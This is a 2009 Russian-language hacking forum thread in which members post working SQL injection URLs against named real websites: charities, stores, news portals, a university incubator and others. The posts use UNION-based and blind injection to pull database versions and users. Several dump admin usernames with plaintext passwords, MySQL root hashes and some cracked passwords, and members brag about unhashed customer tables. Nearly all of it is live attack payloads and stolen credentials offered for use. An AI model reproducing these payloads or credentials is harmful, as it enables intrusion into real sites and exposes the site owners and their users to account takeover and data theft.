SQL Инъекции

z00MAN · 11 Feb 2009

V.O.I.A.C. Victims of Illegal Alien Crime
Code:
http://www.voiac.org/victims.php?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,concat(version(),0x3a,user(),0x3a,database()),45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62--
user(): [email protected]
version(): db35080_voiac
database(): 4.1.25-Debian_mt1

Faith and Reason®
Code:
http://www.faithandreason.org/seminars.php?id=-11+union+select+1,2,concat(convert(version()+using+binary),0x3a,convert(user()+using+binary),0x3a,convert(database()+using+binary)),4,5--
user(): lounge@localhost
version(): lounge
database(): 4.1.14
PR=4

Assembler · 11 Feb 2009

http://history.referama.ru/txt.php?str=1&srch=&ch=-3707%20union%20select%201,2,3,group_concat(table_name),5,6,7,8%20from%20information_schema.tables--

ТЫц тыц =) ( у меня творческий кризис ))

Gorev · 11 Feb 2009

http://www.obiectivdevaslui.ro/advertising.php?page=1&categories_id=-5+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11/*

Version: 4.1.22-standard-log
Database : irina11_obiectiv2008
User : irina11_obiectiv@localhost

Assembler · 11 Feb 2009

http://www.kachnu.ru/txt.php?str=1&srch=&ch=-54%20union%20select%201,2,3,4,group_concat(table_name),6,7,8,9%20from%20information_schema.tables--

5.0.32-Debian_7etch6-log

Gorev · 11 Feb 2009

http://www.berta-art.com/news_details.php?lng=ro&page=&news_id=-5+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11&bertaAdminID=lfabj75f5tpli7bas74nqtj7onbukfso

Version : 5.0.51a
Database : berta_art_db
User : berta_art_user@localhost

z00MAN · 11 Feb 2009

United Way Of Pioneer Valley
Code:
http://www.uwpv.org/?id=-11+union+select+concat(version(),0x3a,database(),0x3a,user())--
user(): gounited@localhost
database(): unitedbs
version(): 4.1.20

PR=5

Bigg Boss 2 Official Site, Watch BiggBoss2 on Colors TV Daily at 10
Code:
http://www.biggboss2.in.com/contestants.php?id=-11+union+select+1,concat(user(),0x3a,database(),0x3a,version()),3,4,5/*
вывод в title
user(): [email protected]
database(): eon18tech2
version(): 5.0.45-log

PR=5

f1ng3r · 11 Feb 2009

Code:
http://www.aktas.lt/news/news_open.php?id=-1+union+select+1,2,3,concat_ ws(0x3a,version(), user(),database()),5,6--
Database Version : 4.0.27-standard
Database name : aktas_duombaze
User name : aktas@localhost

yarbabin · 11 Feb 2009

Code:

http://www.angelhitomi.com/bbs/mex.php?id=-48+union+select+1,2,version(),4,5,6,7,8,9,10/*

4.1.22-standard-log

PR: 4

Gorev · 11 Feb 2009

http://produsesiservicii.profitromania.ro/modul/?id_compan=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7/*

Version : 5.0.32-DEBIAN_7ETCH8-LOG
Database : PROFIT
User : PROFIT@LOCALHOST

AkyHa_MaTaTa · 11 Feb 2009

www.incubator.tsu.ru PageRank: 3 тИЦ: 4700
HTML:
http://www.incubator.tsu.ru/contest/?org=3+union+select+1,2,3,4,5,6,7,8,9,group_concat(concat_ws(0x3A,username,user_password)+SEPARATOR+0x3c62723e),11+from+incubator_tsu_ru.phpbb_users+where+user_level=1--
админка форума:
http://www.incubator.tsu.ru/forum/admin/index.php
-------------------------------------------------------------------------
gwru.ru PageRank: 5 тИЦ: 500
HTML:
http://gwru.ru/world/base?id=-2378+union+select+1,concat_ws(0x3A,user(),@@version,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--

pinky07 · 11 Feb 2009

www.rmz-kazan.ru

третья версия MySQL
http://www.rmz-kazan.ru/?page=5'+and+substring(version(),1,1)='3
Click to expand...

юзер:

http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),1,1))='114 r
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),2,1))='109 m
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),3,1))='122 z
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),4,1))='95 _
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),5,1))='107 k
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),6,1))='97 a
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),7,1))='122 z
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),8,1))='97 a
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),9,1))='110 n
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),10,1))='64 @
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),11,1))='108 l
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),12,1))='111 o
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),13,1))='99 c
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),14,1))='97 a
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),15,1))='108 l
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),16,1))='104 h
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),17,1))='111 o
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),18,1))='115 s
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),19,1))='116 t
Click to expand...

БД:

http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(database(),1,1))='114 r
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(database(),2,1))='109 m
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(database(),3,1))='122 z
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(database(),4,1))='95 _
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(database(),5,1))='107 k
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(database(),6,1))='97 a
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(database(),7,1))='122 z
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(database(),8,1))='97 a
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(database(),9,1))='110 n
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(database(),10,1))='0
Click to expand...

f1ng3r · 12 Feb 2009

Мобильный портал, а также магазин сотовых телефонов. PR - 4
Code:
http://www.o-connect.com/index.php?type=news&id=-1+union+select+concat_ ws(0x3a,version (),user(),database())--
Database Version : 5.0.45
Database name : oconn_oconnectdb
User name : oconn_oconect@localhost

хватаем узеров :
Code:
 http://www.o-connect.com/index.php?type=news&id=-1+union+select+ concat_ws(0x3a,Username,Password)+from +tblendusers+limit+0,1--
их около 1500 тысячи, пассы не захешированы ))

-m0rgan- · 12 Feb 2009

Code:

http://www.hackleyhme.com/health.php?id=-1+union+select+1,2,concat_ws(0x3a,login,password),4+from+Admin--

логин/пасс:

Code:

hme2003:w1nt3r

AkyHa_MaTaTa · 12 Feb 2009

Даешь аниме нахаляву

HTML:

http://animefilm.biz/lib_object_view.php?o=-150'+union+select+concat_ws(0x3A,user(),version(),database()),2,3,4,5,6,7,8,9,10/*

spherics · 12 Feb 2009

http://www.pocketmac.com/product.php?id=309809777809+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
Click to expand...

Database Version: 5.0.54-log
Database name: pocketmacsite
User name: [email protected]

Админы

http://www.pocketmac.com/product.php?id=309809777809+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,(SELECT+CONCAT(userid,0x3a,password)+FROM+pocketmacsite.admin+LIMIT+0,1),0x3a),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
Click to expand...

useridassword

: admin : billy34b
: shekhar : newdelhi
: anne : paloma20

http://www.fazed.org/video/view/?id=380998767+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12--
Click to expand...

Database Version: 5.0.67-community-log
Database name: fazed
User name: root@localhost

http://www.fazed.org/video/view/?id=380998767+union+select+1,2,3,concat_ws(0x3a,user,password),5,6,7,8,9,10,11,12+from+mysql.user+limit+0,1--
Click to expand...

root : *49D31C9CB8CACAC3832DCA30E2A09DD4F0A7E236

http://www.teses.eu/?id=38098770976+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
Click to expand...

Version:4.1.10-standard-log
User:gazela_teses@localhost
Database:gazela_teses

http://www.ufcw1776.org/page.php?id=3890809877908+union+select+concat_ws(0x3a,version(),user(),database()),2,3,4--
Click to expand...

Database Version: 5.0.26-standard-log
Database name: ufcw1776_org
User name: ufcw2@localhost

http://www.musgrave.ie/aboutusa.php?id=37%20or%201=@@version--
Click to expand...

Microsoft SQL Server 2005 - 9.00.2047.00 (Intel X86) Apr 14 2006 01:12:25 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1

http://www.musgrave.ie/aboutusa.php?id=37%20or%201=(select%20system_user)--
Click to expand...

musgravew3

http://www.musgrave.ie/aboutusa.php?id=37%20or%201=(select%20db_name())--
Click to expand...

musgrave.ie

http://en.pasen.it/product_detail.php?id=637987987698+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9--
Click to expand...

Version:5.0.32-Debian_7etch8-log
User:cutefact_admin@localhost
Databaseasen

http://en.pasen.it/product_detail.php?id=637987987698+union+select+1,concat_ws(0x3a,user,password),3,4,5,6,7,8,9+from+mysql.user+limit+0,1--
Click to expand...

root: *3E3ACE7EDB1397754856E421374855C2B32DAA7C
vftp: *8DC54F2E15823C98AEA063E339A5D4C53D1A471A
debian-sys-maint: *BA2FFA1BFAD117D74877D6C5F238406F678F87E8
cutefact_admin: *DEDA5FF13D1EAC8D04D2F5473D2FC9B26853A8B1
syscp: *DEDA5FF13D1EAC8D04D2F5473D2FC9B26853A8B1

http://www.freevstfx.com/free_vst_fx.php?id=79887379876+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10--
Click to expand...

Version:5.0.44-log
User:freevstf@localhost
Database:freevstf

Боенги Боенги Боенги -)

http://www.747sp.com/newsdetail.asp?id=3798798698567+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9--
Click to expand...

Version:4.0.27-max-log
User:[email protected]
Database:Crew747sp

Kraneg · 12 Feb 2009

images.ourontario.ca - PR4
Code:
http://images.ourontario.ca/oshawa/details.asp?ID=42587+or+42587=@@version--
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2
Code:
http://images.ourontario.ca/oshawa/details.asp?ID=42587+or+42587=(SELECT+system_user)--
User: OntarioImagesRead
Code:
http://images.ourontario.ca/oshawa/details.asp?ID=42587+or+42587=(SELECT+db_name())--
CurrentDB: OntarioImages

spherics · 12 Feb 2009

Ребята забираем еще один крупный проект.В общем продажа софта и игр под MAC итд

Читалка хорошо работает в общем воть -)

http://www.freeverse.com/games/game/?id=3666709767809809+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73--
Click to expand...

Database Version: 5.0.45-log
Database name: webstore
User name: store@localhost

/Volumes/ContentHD/sites/fvsite/games/game/index.php
Click to expand...

http://www.freeverse.com/games/game/?id=3666709767809809+union+select+1,2,3,concat_ws(0x3a,user,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73+from+mysql.user--
Click to expand...

root : *382D915D57801D0868AC4A297D89D2E9A35BC63C
gsreader : 10d4c3fb48035600 хэш MySQL : 10d4c3fb48035600 : ahoyhoy
faq : 0fd091c1001b43cb
gsutility : 6d2082810da205a0
gsutility : 30e551d74aed5fad
gsutility : 6d2082810da205a0
mark : 7fa96784501c6d0b
randy : 77eb75a607a7c821
remy : 46b27126746b1141
backup : 606706156665cd86 хэш MySQL : 606706156665cd86:x
mt : *E09333E4221CB5EE5AB01170795377729CB5A146
bhproje_freevers : 6d8369a953851a24 хэш MySQL : 6d8369a953851a24 : monkey
ian : 4d9ff7ac381304d7

bruce : 6d3d1ca975eb70e2
mantis : 0128fa7460afd575
fvreg : 5892ad7204422e2e
hip : 6d3d1ca975eb70e2
justind : 005746604607a15a
cento : 49150a2950a14a25
dave : 6d35f8b12448dddc
brian : *8142E238D0E55344D43071D46CB971C502DD9395
sudoku : 0da5e2fb69f306c9
store : 509cafb91a21d6f9
mint : 0e41167f3411dfe9 хэш MySQL : 0e41167f3411dfe9 : delicious
liz : 7f8e913d229ded36 хэш MySQL : 7f8e913d229ded36 : callico
macfun : 08961af77a9bde4d
macfun_zen : 19bbd9cb1fe53a7b
marktest : 389d6ae97d0fb1c0
cento : 49150a2950a14a25
kevin : 7ab1fc6a1e1a8a44
statsmith : 029552ba79e3f778
bc : 6d2082810da205a0
store : *175B91F9A0B308D93247563A5E0B7B922927AD9F
horling : 1203ae656937fcb4
root : 072bc9bb579ed0ff

http://www.aeromobile.net/news.asp?ID=380980976067+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8--
Click to expand...

Database Version: 5.0.22-community-nt
Database name: aeromobile
User name: aeromobileadmin@localhost

http://www.aeromobile.net/news.asp?ID=380980976067+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,(SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+aeromobile.users+LIMIT+1,1),0x3a),0x71),0x71),3,4,5,6,7,8--
Click to expand...

: martin : 2mm
: alex : CovertClose

Gorev · 12 Feb 2009

http://www.ponturi.ro/subcat.php?idc=-9+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5/*&ids=1&mod_afisare=2

Database Version: 5.0.27
Database name: ponturi
User name: [email protected]

f1ng3r · 12 Feb 2009

Code:
http://www.poveche.net/news.php?id=-1+union+select+1,2,3,concat_ ws(0x3a,version(),database (),user())--
Database Version : 4.0.27-log
Database name : bcaf
User name : poveche@localhost
Code:
http://www.paragon-bg.com/news.php?id=-1+union+select+1,2,concat_ws(0x3a,version (), database(),user()),4,5,6--
Database Version : 5.0.32-Debian_7etch8-log
Database name : metasoft_paragon
User name : paragon@localhost

берем узверей:
Code:
http://www.paragon-bg.com/news.php?id=-1+union+select+1,2,concat _ws(0x3a,username,pswrd,email),4,5,6 +from+clients+limit+1,1--
берем админа:
Code:
http://www.paragon-bg.com/news.php?id=-1+union+select+1,2,concat _ ws(0x3a,username,pswrd,privilegel),4,5,6 +from+clients+limit+0,1--

Gorev · 12 Feb 2009

http://www.clip-trade.ro/store/view.php?prod=4010063&brid=-2+UNION+SELECT+1,CONCAT_WS(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/*

Version : 4.1.22-standard
Database : cliptra_store
User: cliptra_store@localhost

SQL Инъекции

z00MAN Banned

Assembler Elder - Старейшина

Gorev Level 8

Assembler Elder - Старейшина

Gorev Level 8

z00MAN Banned

f1ng3r [забытый полк]

yarbabin HACKIN YO KUT

Gorev Level 8

AkyHa_MaTaTa Elder - Старейшина

pinky07 Member

f1ng3r [забытый полк]

-m0rgan- Elder - Старейшина

AkyHa_MaTaTa Elder - Старейшина

spherics Elder - Старейшина

Kraneg Elder - Старейшина

spherics Elder - Старейшина

Gorev Level 8

f1ng3r [забытый полк]

Gorev Level 8

Useful Searches

SQL Инъекции

z00MAN Banned

Assembler Elder - Старейшина

Gorev Level 8

Assembler Elder - Старейшина

Gorev Level 8

z00MAN Banned

f1ng3r [забытый полк]

yarbabin HACKIN YO KUT

Gorev Level 8

AkyHa_MaTaTa Elder - Старейшина

pinky07 Member

f1ng3r [забытый полк]

-m0rgan- Elder - Старейшина

AkyHa_MaTaTa Elder - Старейшина

spherics Elder - Старейшина

Kraneg Elder - Старейшина

spherics Elder - Старейшина

Gorev Level 8

f1ng3r [забытый полк]

Gorev Level 8